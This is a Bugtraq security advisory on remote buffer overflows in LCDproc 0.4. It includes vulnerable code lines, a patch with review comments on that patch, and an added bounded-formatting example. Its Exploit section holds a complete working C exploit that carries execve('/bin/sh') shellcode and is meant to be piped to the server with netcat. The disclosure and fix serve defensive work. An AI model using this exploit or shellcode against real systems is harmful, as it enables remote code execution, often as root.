Date: Fri, 21 Apr 2000 01:12:18 -0400
From: Andrew Hobgood <chaos@STRANGE.NET>
Subject: Remote vulnerability in LCDproc 0.4
To: BUGTRAQ@SECURITYFOCUS.COM

==============================================================
=== Title:  Vulnerability in LCDproc                       ===
=== Date:   20 April 2000                                  ===
=== Author: Andrew Hobgood <chaos@strange.net>             ===
==============================================================

[ Note: The LCDproc maintainers have been notified of this vulnerability, ]
[ and have stated that they are prepared for this advisory to be          ]
[ released.                                                               ]

=================
=== Specifics ===
=================

LCDproc (http://lcdproc.omnipotent.net) is a system for displaying system
information and other data on an LCD (or on any supported display device,
including curses or plain text). As of version 0.4 it uses a client/server
model: clients that want to put data on the display connect to the LCDproc
server over a socket and negotiate a session.

LCDproc is commonly used on embedded servers and in other places where system
statistics must be visible at a glance but space or other constraints rule out
a monitor. Because the server usually has to talk to the LCD hardware
directly, it is commonly installed setuid root or setgid uucp.

While this design is highly extensible, the protocol-handling code builds
messages with sprintf() into fixed-size buffers without checking the length
of client-supplied strings. These overflows let a remote client that can
reach the server execute arbitrary code with the server's privileges, or
simply crash the LCDproc server.
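The bug class at issue, as an added example that is not LCDproc's code: an sprintf() of a client-controlled string into a fixed buffer, next to a bounded form that reports truncation, plus a tokenizer that fills a fixed argv[] without running off its end. MSG_LEN, MAX_ARGS, the `{...}` quoting rule, the two "known" command names and every function name here are assumptions made for the illustration.

```c
/* Added example, not LCDproc code. Buffer sizes, MAX_ARGS, the brace-quoting
 * rule and all names are assumptions chosen to illustrate the bug class. */
#include <stdio.h>
#include <string.h>

#define MAX_ARGS 256
#define MSG_LEN  256

/* Vulnerable shape: errmsg is a fixed buffer, cmd is client controlled, and
 * sprintf writes strlen(cmd) + 24 bytes no matter how big errmsg is. Kept for
 * comparison only; never call it on untrusted input. */
int format_error_unbounded(char *errmsg, const char *cmd)
{
    return sprintf(errmsg, "huh? Invalid command \"%s\"\n", cmd);
}

/* Bounded form: snprintf writes at most MSG_LEN - 1 bytes plus the NUL and
 * returns the length it wanted, so truncation is detectable, not silent. */
int format_error_bounded(char errmsg[MSG_LEN], const char *cmd, int *truncated)
{
    int n = snprintf(errmsg, MSG_LEN, "huh? Invalid command \"%s\"\n", cmd);
    *truncated = (n < 0 || n >= MSG_LEN);
    return n;
}

/* Splits line in place on blanks; a token starting with '{' runs to the next
 * '}' so it may contain blanks. Once argv is full, further tokens are counted
 * in *dropped instead of stored, so argv[MAX_ARGS] is never written. */
int tokenize(char *line, char *argv[MAX_ARGS], int *dropped)
{
    int argc = 0;
    char *p = line;
    *dropped = 0;
    while (*p) {
        while (*p == ' ' || *p == '\t' || *p == '\n')
            p++;                                 /* skip separators */
        if (!*p)
            break;
        char *tok;
        if (*p == '{') {                         /* quoted token */
            tok = ++p;
            while (*p && *p != '}')
                p++;
        } else {                                 /* bare token */
            tok = p;
            while (*p && *p != ' ' && *p != '\t' && *p != '\n')
                p++;
        }
        if (*p)
            *p++ = '\0';                         /* terminate token in place */
        if (argc < MAX_ARGS)
            argv[argc++] = tok;
        else
            (*dropped)++;
    }
    return argc;
}

/* One request line the way a server loop would see it: bounded copy,
 * tokenize, and answer an unknown command with a bounded error reply.
 * Returns argc; *dropped and *truncated report what had to be cut. */
int handle_line(const char *input, int *dropped, int *truncated)
{
    char line[4096];
    char *argv[MAX_ARGS];
    char errmsg[MSG_LEN];

    snprintf(line, sizeof line, "%s", input);
    int argc = tokenize(line, argv, dropped);
    *truncated = 0;
    if (argc > 0 && strcmp(argv[0], "hello") != 0 && strcmp(argv[0], "screen_add") != 0)
        format_error_bounded(errmsg, argv[0], truncated);
    return argc;
}

int main(void)
{
    char big[512];                               /* constructed: a 300-byte bogus command */
    int dropped, truncated;

    memset(big, 'A', 300);
    big[300] = '\0';
    int argc = handle_line(big, &dropped, &truncated);
    printf("argc=%d dropped=%d error-truncated=%d\n", argc, dropped, truncated);

    char cmd[] = "screen_add {hello world} foo\n"; /* constructed request */
    char *argv[MAX_ARGS];
    argc = tokenize(cmd, argv, &dropped);
    printf("argc=%d argv[1]=\"%s\"\n", argc, argv[1]);
    return 0;
}
```

The unbounded function is the shape of the calls listed in this advisory; the bounded one differs only in the size argument and in checking the return value, which is the part most snprintf conversions forget and which matters when the truncated string is an identifier the peer will later match on.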
Improper boundary conditions exist at various locations in the code,
including:

[ Note: argv[0] in this context is *not* the argv[] from main(). ]

   parse.c:149:       sprintf(errmsg, "huh? Invalid command \"%s\"\n", argv[0]);
   screenlist.c:119:  sprintf(str, "ignore %s\n", old_s->id);
   screenlist.c:134:  sprintf(str, "listen %s\n", s->id);

as well as other locations. In each case the format string is expanded into a
fixed-size buffer with no length check, and the %s argument (the command name
or the screen id) comes straight from the client.

==============
=== Impact ===
==============

Any system running LCDproc 0.4 or later (including the 0.4-pre series) is
vulnerable. The exploit below targets Linux/x86 only and, as written, has
limited attack potential, but the underlying overflows are not specific to
that platform. Remote code execution is gained as whatever user and group
LCDproc runs as; given the setuid root / setgid uucp installs described
above, that is frequently root or uucp.

==========================
=== Temporary Solution ===
==========================

Disable LCDproc, or downgrade to version 0.3 or earlier, which predates the
client/server implementation introduced in 0.4. A patch against LCDproc
0.4-pre9 (available from the LCDproc home site at
http://lcdproc.omnipotent.net) is also included in this message.

================================
=== Patch (against 0.4-pre9) ===
================================

[ This patch is also available at                                 ]
[ http://web.strange.net/patches/lcdproc.20April2000.patch        ]

(The patch is attached to this message rather than inlined, to prevent line
wrapping and similar corruption.)

===============
=== Exploit ===
===============

[ Note: This code launches /bin/sh on the remote site. Unfortunately, this ]
[ shell is execve()'ed, and inherits the stdin/stdout of the main          ]
[ LCDproc process, and therefore just runs /bin/sh on the remote          ]
[ site, instead of over the socket. Blah. I didn't feel like              ]
[ hacking up shellcode to do something more productive. I'm sure          ]
[ that someone else much more capable than myself will take care of       ]
[ that on my behalf.
]

/*****
 * lcdproc-exploit.c
 *****
 *
 * LCDproc 0.4-pre9 exploit
 *
 * Andrew Hobgood <chaos@strange.net>
 * Kha0S on #LinuxOS/EFnet
 *
 * Tested on Linux/x86 2.2.5-15smp (the only Intel box I could get my hands
 * on for testing).
 *
 * Builds a 269-byte argument for "screen_add": a NOP sled, the execve
 * shellcode, then four copies of the guessed return address, and writes the
 * protocol exchange to stdout so it can be piped into the server's port.
 *
 *****
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <string.h>

#define BUFFERSIZE 269          /* length of the screen_add argument */
#define NOP        0x90
#define OFFSET     0xbffff750   /* guessed stack address inside the NOP sled */

/* Linux/x86 execve("/bin/sh") shellcode; contains no NUL bytes so the whole
 * string survives the server's C string handling. */
char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
  "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
  "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
  "\xff\xff/bin/sh";

int main(int argc, char **argv)
{
  char *ptr, buffer[BUFFERSIZE + 1];  /* +1 keeps the terminating NUL in bounds */
  uint32_t *long_ptr;                 /* target is 32-bit: addresses are 4 bytes */
  unsigned long offset = OFFSET;
  int aux;

  fprintf(stderr, "LCDproc exploit by Andrew Hobgood <chaos@strange.net>\n\n");
  fprintf(stderr, "Usage: (%s [<offset>]; cat) | nc <target> 13666\n\n", argv[0]);

  if (argc == 2)
    offset += atol(argv[1]);

  /* NOP sled fills everything except the shellcode and the 16 address bytes */
  ptr = buffer;
  memset(ptr, 0, sizeof(buffer));
  memset(ptr, NOP, BUFFERSIZE - strlen(shellcode) - 16);
  ptr += BUFFERSIZE - strlen(shellcode) - 16;

  memcpy(ptr, shellcode, strlen(shellcode));
  ptr += strlen(shellcode);

  /* four copies of the guessed return address */
  long_ptr = (uint32_t *) ptr;
  for (aux = 0; aux < 4; aux++)
    *(long_ptr++) = (uint32_t) offset;

  ptr = (char *) long_ptr;
  *ptr = '\0';

  fprintf(stderr, "Buffer size: %d\n", (int) strlen(buffer));
  fprintf(stderr, "Offset: 0x%lx\n\n", offset);

  /* protocol: greet the server, then hand it an oversized screen id */
  printf("hello\n");
  fflush(stdout);
  sleep(1);
  printf("screen_add {%s}\n", buffer);
  fflush(stdout);

  return 0;
}

/*** end lcdproc-exploit.c ***/
===========================================
=== Attachment: lcdproc.patch (decoded) ===
===========================================

diff -ur ./WHATSNEW ../lcdproc-hacked/WHATSNEW
--- ./WHATSNEW	Thu Oct 21 20:04:59 1999
+++ ../lcdproc-hacked/WHATSNEW	Thu Apr 20 13:53:54 2000
@@ -11,6 +11,11 @@
  * Better syntax for driver parameters
  * Dynamically-loaded driver system
 
+>> Patched for bugs as follows by Andrew Hobgood <chaos@strange.net>:
+ * Three buffer overflows in various locations [screenlist.c, parse.c, others]
+ * Prevent too many arguments from walking over the boundary of the fixed
+   client_func argv.
+
 V0.4-pre9:
  * small fixes for irix
  * Added flag in LCDd to shut off server screen:  
diff -ur ./server/client_functions.c ../lcdproc-hacked/server/client_functions.c
--- ./server/client_functions.c	Thu Oct 21 18:14:21 1999
+++ ../lcdproc-hacked/server/client_functions.c	Thu Apr 20 14:12:42 2000
@@ -68,7 +68,7 @@
    
    for(i=0; i<argc; i++)
    {
-      sprintf(str, "test_func_func:  %i -> %s\n", i, argv[i]);
+      snprintf(str, 256, "test_func_func:  %i -> %s\n", i, argv[i]);
       printf(str);
       sock_send_string(c->sock, str);
    }
@@ -89,7 +89,7 @@
    
    debug("Hello!\n");
 
-   sprintf(str,
+   snprintf(str, 256,
 	    "connect LCDproc %s lcd wid %i hgt %i cellwid %i cellhgt %i\n",
 	   version, lcd.wid, lcd.hgt, lcd.cellwid, lcd.cellhgt);
    sock_send_string(c->sock, str);
@@ -193,6 +193,9 @@
   }
 
 
+   // truncate argv[1] so that it can't be used later to overflow any
+    // buffers.				Andrew Hobgood <chaos@strange.net>
+   argv[1][128] = 0;
    debug("screen_add: Adding screen %s\n", argv[1]);
    err = screen_add(c, argv[1]);
    if(err < 0)
diff -ur ./server/parse.c ../lcdproc-hacked/server/parse.c
--- ./server/parse.c	Sat Feb 20 20:53:23 1999
+++ ../lcdproc-hacked/server/parse.c	Thu Apr 20 14:06:52 2000
@@ -93,12 +93,21 @@
 	       if(newtoken && str[i])
 	       {
 		  newtoken=0;
-		  argv[argc] = str + i;
-		  argc++;
-	       }
-	       else
-	       {
-	       }
+		  // make sure that we're not going to go over the fixed 
+		  // number of allowed arguments in argv
+		  // 			Andrew Hobgood <chaos@strange.net>
+		  if(argc < 255) 
+		  {
+		     argv[argc] = str + i;
+		    argc++;
+		 } else 
+		  {
+	            debug("Too many arguments, ignoring past 256.\n");
+		  }
+		}
+	        else
+		{
+		}
 	    }
 	    if(inquote)
 	    {
@@ -135,7 +144,9 @@
 	    if(invalid)
 	    {
 	       // FIXME:  Check for buffer overflows here...
-	       sprintf(errmsg, "huh? Invalid command \"%s\"\n", argv[0]);
+	       // You were right -- there was one here. =)  More or less 
+	       // fixed: 		Andrew Hobgood <chaos@strange.net>
+	       snprintf(errmsg, 256, "huh? Invalid command \"%s\"\n", argv[0]);
 	       sock_send_string(c->sock, errmsg);
 	    }
 
diff -ur ./server/screenlist.c ../lcdproc-hacked/server/screenlist.c
--- ./server/screenlist.c	Fri Mar 12 00:20:39 1999
+++ ../lcdproc-hacked/server/screenlist.c	Thu Apr 20 14:09:03 2000
@@ -116,7 +116,7 @@
 	    c = old_s->parent;
 	    if(c)  // Tell the client we're not listening any more...
 	    {
-	       sprintf(str, "ignore %s\n", old_s->id);
+	       snprintf(str, 256, "ignore %s\n", old_s->id);
 	       sock_send_string(c->sock, str);
 	    }
 	    else  // The server has the display, so do nothing
@@ -131,7 +131,7 @@
 	 c = s->parent;
 	 if(c)  // Tell the client we're paying attention...
 	 {
-	    sprintf(str, "listen %s\n", s->id);
+	    snprintf(str, 256, "listen %s\n", s->id);
 	    sock_send_string(c->sock, str);
 	 }
 	 else  // The server has the display, so do nothing
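Review bot: the WHATSNEW hunk undercounts the change: the entry says "Three buffer overflows", but the patch converts five sprintf calls (two in client_functions.c, one in parse.c, two in screenlist.c) and adds an argv[1] truncation and an argc bound; list the files and call sites actually touched so packagers can verify they carry every fix.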
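Review bot: in the client_functions.c @@ -68 hunk the context line `printf(str);` right after the new snprintf still passes a string built from client-supplied argv[i] as the format argument, so a format-string bug sits next to the overflow being fixed; change it to `printf("%s", str);`. The literal `256` should also be `sizeof(str)` so the bound follows the declaration rather than a number remembered from it.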
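Review bot: the @@ -89 hunk repeats the magic number: `snprintf(str, 256,` hard-codes the buffer length instead of deriving it (`sizeof(str)` if str is an array, as the 256 suggests); if str is ever resized the bound silently goes wrong, which is the same failure mode the patch is fixing.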
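Review bot: in the @@ -193 hunk `argv[1][128] = 0;` writes at a fixed offset without checking that argv[1] is that long: argv[1] points into the tokenized request buffer (parse.c sets `argv[argc] = str + i`), so for a short screen id the NUL lands on a later token or past the end of the input, and no argc check guarding argv[1] is visible in the hunk. Truncate only when `strlen(argv[1]) > 128`, or copy the id into a bounded local with snprintf, and align the second comment line, which is one column off from the first.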
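Review bot: the parse.c @@ -93 hunk's bound and message disagree: `if(argc < 255)` keeps at most 255 arguments while the debug line says "ignoring past 256", and neither number is tied to the declared size of argv (not visible here); define one constant for the array size and use it in both the check and the message. The restructured block also leaves an empty `else { }` that does nothing and can be dropped.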
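Review bot: the @@ -135 hunk leaves the stale `// FIXME:  Check for buffer overflows here...` in place and adds a conversational "You were right" comment above the fix; replace both with one line stating the bound, and as in the other hunks use `sizeof(errmsg)` rather than the literal `256`.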
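Review bot: in the screenlist.c @@ -116 hunk bounding the `ignore %s` reply with snprintf stops the overflow but silently truncates a long old_s->id, so the client is told to ignore a screen id that does not match the one it registered; either reject over-long ids when the screen is created, or compare the snprintf return value against 256 and log the truncation instead of sending a mismatched id.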
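Review bot: the @@ -131 hunk has the same truncation problem as the `ignore` case, a cut-short `listen %s` names the wrong screen to the client; both call sites duplicate the same snprintf/sock_send_string pair and would be safer as one helper that formats, checks the return value, and sends.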